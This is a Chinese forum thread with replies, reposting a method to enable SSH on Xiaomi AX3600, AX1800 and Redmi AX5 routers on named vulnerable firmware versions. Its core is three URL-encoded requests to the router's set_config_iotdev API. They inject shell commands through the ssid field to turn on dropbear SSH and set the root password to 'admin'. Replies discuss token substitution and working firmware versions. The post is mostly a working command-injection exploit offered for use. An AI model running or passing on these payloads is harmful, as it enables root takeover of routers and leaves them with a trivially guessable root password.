AX3600、AX1800、AX5官方固件开启SSH方法——清雨收集并优化

haifon

AX3600、AX1800、AX5官方固件开启SSH方法——清雨收集并优化，小白版我恩山第一次发帖子，群里很多人看原帖不会，让我发帖我改下，希望原作者不要怪
详细请看原帖
https://www.right.com.cn/forum/f ... hlight=ax5&mobile=2

有漏洞固件
AX3600 1.0.17版本/AX1800 1.0.34/1.0.328版本/AX5 1.0.16版本；AX3600的1.0.20和1.0.50版本应该已经修复了

AX1800 1.0.34版本固件竟然同样也可用以下方法开启SSH，1.0.328的固件仍然适用，最新的1.0.336未知，有兴趣的同学验证

同样适用于红米AX5，出厂固件1.0.16版本


进入路由复制串号，替换下面的小写stok等号右边的大写<STOK>，带符号一起替换，不要说误人子弟，细心的复制串号就可对比发现
开ssh命令：
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B
改密码命令(必须改密码，不改密码无法连接ssh)：改密码为admin
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B

改成一行
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B

LonGDikE

原帖隐藏的内容这样发出来不好吧

jackqian2

楼主怎么使用这几个连接

kacha2000

买个AX1800试一试

pnq

原作者说“转贴请注明作者及出处”！！！

Vip3666888

感谢楼主的分享

ra22123

热度蹭的明明白白。

wyg770519

什么情况

wei0812

谢谢，改天试试

20663690

{"code":401,"msg":"Invalid token"}    这个是什么，怎么搞

jackqian2

<STOK>连带这个2个三角符号也要删掉，填入一串数字，我本来以为符号要的，这个误人子弟啊

yuyan1081

感谢楼主的分享

SG4YK

AX1800亲测1.0.336可用

haifon

替换下面的<STOK>用蓝色标注了，肯定带符号替换，还误认子弟，真不知道怎么理解的，都标颜色了，细心的和官方串号对比就知道了

haifon

为何要加<STOK>还大写，就是因为有二个stok有人就会都替换，啥人都有，思考能力也是醉了，第一次发帖，碰一鼻子灰，还要群里论坛里解释累少发帖了少累